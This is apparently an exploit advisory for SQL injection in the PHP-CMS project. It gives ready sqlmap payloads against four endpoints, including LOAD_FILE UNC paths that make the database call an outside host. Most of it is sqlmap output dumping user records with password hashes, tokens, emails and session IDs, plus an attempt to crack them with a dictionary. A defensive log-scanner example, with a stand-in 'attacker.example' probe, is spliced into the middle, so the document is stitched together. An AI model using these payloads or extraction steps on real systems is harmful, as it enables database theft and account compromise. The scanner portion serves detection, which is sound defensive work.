Multiple SQLi
Affected endpoints:
http://pwned_host.com/PHP-CMS-master/categorymenu.php
http://pwned_host.com/PHP-CMS-master/forgot.php
http://pwned_host.com/PHP-CMS-master/post.php
http://pwned_host.com/PHP-CMS-master/search.php
Payloads:
---
Parameter: category (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: category=(select load_file('\\\\q3uuxrcogrxwpaeoschnmxmtxk3dr4fvhj86yun.github.com/harshitbansal373/PHP-CMS\\hns')) OR NOT 2848=2848
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: category=(select load_file('\\\\q3uuxrcogrxwpaeoschnmxmtxk3dr4fvhj86yun.github.com/harshitbansal373/PHP-CMS\\hns')) AND (SELECT 4559 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(SELECT (ELT(4559=4559,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=(select load_file('\\\\q3uuxrcogrxwpaeoschnmxmtxk3dr4fvhj86yun.github.com/harshitbansal373/PHP-CMS\\hns')) AND (SELECT 5517 FROM (SELECT(SLEEP(5)))RgGf)
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: category=(select load_file('\\\\q3uuxrcogrxwpaeoschnmxmtxk3dr4fvhj86yun.github.com/harshitbansal373/PHP-CMS\\hns')) UNION ALL SELECT NULL,NULL,CONCAT(0x7170767671,0x797054776f65536e4a79476a475a6f6a4e5156644c427a4a534368524f65764a4e585a4b7258656f,0x716b766b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
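The four payload classes sqlmap reports above (boolean-based blind, error-based via FLOOR(RAND(0)*2), time-based SLEEP, and UNION ... SELECT NULL column probing) plus the LOAD_FILE UNC-path prefix are all visible in the query string, so a defender can pick them out of ordinary web-server access logs. The following Python scanner is an added example and is not code from the advisory or from the PHP-CMS project; it generalises the signatures beyond the exact strings shown. The log lines, the client IP, the user agents and the host `attacker.example` are constructed for this example.

```python
"""Flag sqlmap-style SQL injection probes in combined-format access logs.

Added example, not code from the advisory or from the PHP-CMS project.
The rules generalise the payload classes shown in the advisory; the log
lines, client IP, user agents and the host 'attacker.example' are all
constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# (label, regex) pairs applied to each URL-decoded parameter value.
RULES = [
    # LOAD_FILE with a UNC path makes the database server connect out to a remote host.
    ("load_file", re.compile(r"load_file\s*\(", re.I)),
    # "OR|AND [NOT] n=n" appended to a condition: boolean-based blind.
    ("boolean_blind", re.compile(r"\b(or|and)\s+(not\s+)?\d+\s*=\s*\d+", re.I)),
    # FLOOR(RAND(0)*2) ... GROUP BY: the classic MySQL duplicate-key error-based probe.
    ("error_based_floor", re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I)),
    # SLEEP(n): time-based blind.
    ("time_based_sleep", re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
    # UNION [ALL] SELECT NULL,NULL,...: column-count discovery for UNION injection.
    ("union_null", re.compile(r"union\s+(all\s+)?select\s+(null\s*,\s*)*null", re.I)),
]


def analyze_line(line):
    """Return a finding dict for a suspicious request, or None if the line is
    benign or does not parse. Parameter values are decoded with parse_qs, so
    percent-encoding and '+' spaces do not hide a payload from the rules."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    hits = []
    for param, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            labels = [label for label, rx in RULES if rx.search(value)]
            if labels:
                hits.append({"param": param, "rules": labels})
    if not hits:
        return None
    return {"ip": m.group("ip"), "path": parts.path, "ua": m.group("ua"), "hits": hits}


def scan(lines):
    """Run analyze_line over an iterable of log lines and keep only the findings."""
    return [f for f in (analyze_line(l) for l in lines) if f]


def _logline(path, params, ua="sqlmap/1.6"):
    """Build a constructed combined-format line; urlencode mirrors what the
    client sends (spaces as '+', backslashes and quotes percent-encoded)."""
    return (f'203.0.113.5 - - [11/Apr/2022:14:47:11 +0000] '
            f'"GET {path}?{urlencode(params)} HTTP/1.1" 200 4096 "-" "{ua}"')


CAT = "/PHP-CMS-master/categorymenu.php"
SAMPLE_LOG = [  # constructed sample log: one benign hit per endpoint plus one probe per class
    _logline(CAT, {"category": "1"}, ua="Mozilla/5.0"),
    _logline(CAT, {"category": r"(select load_file('\\\\attacker.example\\hns')) OR NOT 2848=2848"}),
    _logline(CAT, {"category": "1 AND (SELECT 4559 FROM(SELECT COUNT(*),CONCAT(0x71,(SELECT (ELT(4559=4559,1))),0x71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"}),
    _logline(CAT, {"category": "1 AND (SELECT 5517 FROM (SELECT(SLEEP(5)))RgGf)"}),
    _logline(CAT, {"category": "1 UNION ALL SELECT NULL,NULL,CONCAT(0x71,0x41,0x71),NULL,NULL,NULL,NULL,NULL,NULL-- -"}),
    _logline("/PHP-CMS-master/search.php", {"search": "android phones"}, ua="Mozilla/5.0"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], finding["path"], finding["ua"], finding["hits"])
```

Matching is done on the decoded parameter value rather than on the raw request line, because the same payload can arrive percent-encoded, with `+` for spaces, or in mixed case; the rules are case-insensitive for the same reason. A real deployment would feed `scan()` the access log for every endpoint listed above, not just categorymenu.php, and would treat any LOAD_FILE hit as a sign that the database account has FILE privilege, which is a separate hardening item.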
---
Dump:
Database: cms
Table: users
[4 entries]
+---------+------------------------------------------------------------------------------------------------------+-------------------------------+---------------+------------+----------------------+------------+---------------+--------------------------------------------------------------+----------------+
| user_id | token | randSalt | username | user_role | user_email | user_image | user_lastname | user_password | user_firstname |
+---------+------------------------------------------------------------------------------------------------------+-------------------------------+---------------+------------+----------------------+------------+---------------+--------------------------------------------------------------+----------------+
| 17 | 77020c98efbc545715012c76bec5aaec6e8a2cfced12d25f1c2f2626a1ef4af2271b1e458848d80a745e6b578b954cf34427 | $2y$10$iusesomecrazystrings22 | harshitbansal | admin | example@gmail.com | <blank> | bansal | $2y$10$iusesomecrazystrings2uvgnjnDOGIE6JPA9zzq36EdPnYMUav/S | harshit |
| 20 | 77020c98efbc545715012c76bec5aaec6e8a2cfced12d25f1c2f2626a1ef4af2271b1e458848d80a745e6b578b954cf34427 | $2y$10$iusesomecrazystrings22 | priyanka | subscriber | example@gmail.com | <blank> | sharma | $2y$12$JWAZjgfODGxhEpsJShk4TO5MHGZ/hUnliFfkwPEvsLkfCJOdJ6ugy | priyanka |
| 22 | 77020c98efbc545715012c76bec5aaec6e8a2cfced12d25f1c2f2626a1ef4af2271b1e458848d80a745e6b578b954cf34427 | $2y$10$iusesomecrazystrings22 | raghuveer | subscriber | example123@gmail.com | <blank> | singh | $2y$12$kTq/GUEkryih.nT9O77KfeyMp9165ZIqlvu1dEOQLKW8RWv0te46W | raghuveer |
| 26 | <blank> | $2y$10$iusesomecrazystrings22 | raghuveer23 | subscriber | example@gmail.com | <blank> | sharma | $2y$12$23Bqzby0qrz3VfojjbZjT.e4nwL7a68nJk7A4E9bgolDlWmG0lL7m | raghuveer |
+---------+------------------------------------------------------------------------------------------------------+-------------------------------+---------------+------------+----------------------+------------+---------------+--------------------------------------------------------------+----------------+
[14:47:11] [INFO] table 'cms.users' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\users.csv'
[14:47:11] [INFO] fetching columns for table 'posts' in database 'cms'
[14:47:11] [INFO] fetching entries for table 'posts' in database 'cms'
Database: cms
Table: posts
[9 entries]
+---------+------------------+------------+----------------------------------------+---------------+-----------------------------+--------------+-------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------+--------------------+
| post_id | post_category_id | post_date | post_tags | post_user | post_image | post_title | post_status | post_content | post_views_count | post_comment_count |
+---------+------------------+------------+----------------------------------------+---------------+-----------------------------+--------------+-------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------+--------------------+
| 1 | 1 | 2018-10-16 | harshit,website | harshitbansal | Boeremark.jpg | Website | draft | you are doing well...\r\n | 1 | 2 |
| 2 | 1 | 2018-10-21 | life,Rajesh,How to work | raghuveer | 544106281_1280x720.jpg | How to work? | draft | you should move on without afraid of what will the curcumstances... | 2 | 0 |
| 3 | 1 | 2018-10-24 | Android, namandeep, mobile, smartphone | priyanka | work-life-balance.jpg | Android | published | Android is a mobile operating system developed by Google, based on a modified version of the Linux kernel and other open source software and designed primarily for touchscreen mobile devices such as smartphones and tablets | 1 | 1 |
| 8 | 1 | 2019-01-10 | life , ctrl | harshitbansal | life-008.jpg | life | published | life has no ctrl+z \r\nhahahaha | 0 | 0 |
| 10 | 1 | 2018-10-21 | time, money | raghuveer | time.jpeg | Time | published | time is money. | 0 | 1 |
| 11 | 1 | 2018-10-21 | goes on, suresh, life | raghuveer | life-expectancy-decline.jpg | Goes on | published | this is the content for this post. | 0 | 0 |
| 12 | 3 | 2018-10-30 | dvjdjsv | vijay | <blank> | fdnbkfd | d,jvsd | bdssvkbdsk | 0 | 0 |
| 13 | 1 | 2018-11-08 | vinod, diwali | vijay | <blank> | diwali | published | <p>hello frnds happy diwali!!</p> | 0 | 0 |
| 14 | 3 | 2019-01-10 | accounts, tanya, bela | priyanka | <blank> | accounts | published | <p>accounting is an identifying process</p> | 0 | 0 |
+---------+------------------+------------+----------------------------------------+---------------+-----------------------------+--------------+-------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------+--------------------+
[14:47:11] [INFO] table 'cms.posts' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\posts.csv'
[14:47:11] [INFO] fetching columns for table 'comments' in database 'cms'
[14:47:11] [INFO] fetching entries for table 'comments' in database 'cms'
Database: cms
Table: comments
[5 entries]
+------------+-----------------+--------------+-------------------+----------------+----------------+-----------------+
| comment_id | comment_post_id | comment_date | comment_email | comment_author | comment_status | comment_content |
+------------+-----------------+--------------+-------------------+----------------+----------------+-----------------+
| 25 | 1 | 2019-01-16 | example@gmail.com | daau | show | vfadvcv |
| 26 | 1 | 2019-01-16 | example@gmail.com | dinesh | show | vfvfdvfsv |
| 27 | 2 | 2019-01-16 | example@gmail.com | daau | show | fvfvfev |
| 28 | 2 | 2019-01-16 | example@gmail.com | dinesh | show | vfbgrbrt |
| 37 | 2 | 2019-01-19 | example@gmail.com | fdgd | show | cxvfv |
+------------+-----------------+--------------+-------------------+----------------+----------------+-----------------+
[14:47:12] [INFO] table 'cms.comments' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\comments.csv'
[14:47:12] [INFO] fetching columns for table 'users_online' in database 'cms'
[14:47:12] [INFO] fetching entries for table 'users_online' in database 'cms'
[14:47:12] [INFO] recognized possible password hashes in column '`session`'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[14:47:12] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'D:\CVE\sqlmap\data\txt\nu11secur1ty.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[14:47:12] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:47:12] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[14:47:12] [INFO] starting 8 processes
[14:47:13] [WARNING] no clear password(s) found
Database: cms
Table: users_online
[4 entries]
+----+------------+----------------------------------+
| id | time | session |
+----+------------+----------------------------------+
| 28 | 1541324861 | acqtk6uivrc3mancr6jubo36g8 |
| 40 | 1548511410 | ipke8cras4eauiu50upkm1mocd |
| 41 | 1548401977 | l4qj6m6jv3ges0us7cqvrqovhq |
| 42 | 1562584762 | fd7b414bec20e569f9bd17c4e7ef4c13 |
+----+------------+----------------------------------+
[14:47:13] [INFO] table 'cms.users_online' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\users_online.csv'
[14:47:13] [INFO] fetching columns for table 'categories' in database 'cms'
[14:47:14] [INFO] fetching entries for table 'categories' in database 'cms'
Database: cms
Table: categories
[5 entries]
+--------+-------------------------------------------+-----------+---------------+
| cat_id | cat_user | cat_title | cat_creator |
+--------+-------------------------------------------+-----------+---------------+
| 1 | harshit,raghuveer23,raghuveer,vikas,daau, | home | harshitbansal |
| 3 | <blank> | service | harshitbansal |
| 5 | <blank> | contact | harshitbansal |
| 7 | raghuveer, | about | harshitbansal |
| 55 | <blank> | hello | harshitbansal |
+--------+-------------------------------------------+-----------+---------------+
[14:47:14] [INFO] table 'cms.categories' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\categories.csv'
[14:47:14] [INFO] fetched data logged to text files under 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com'
[*] ending @ 14:47:14 /2022-04-11/
STATUS: Critical! =)
NOTE:
- The PoC will be encrypted, sorry about this dear friends!
- If someone wants to see this work, please write me!
- KR @nu11secur1ty - Penetration Testing Engineer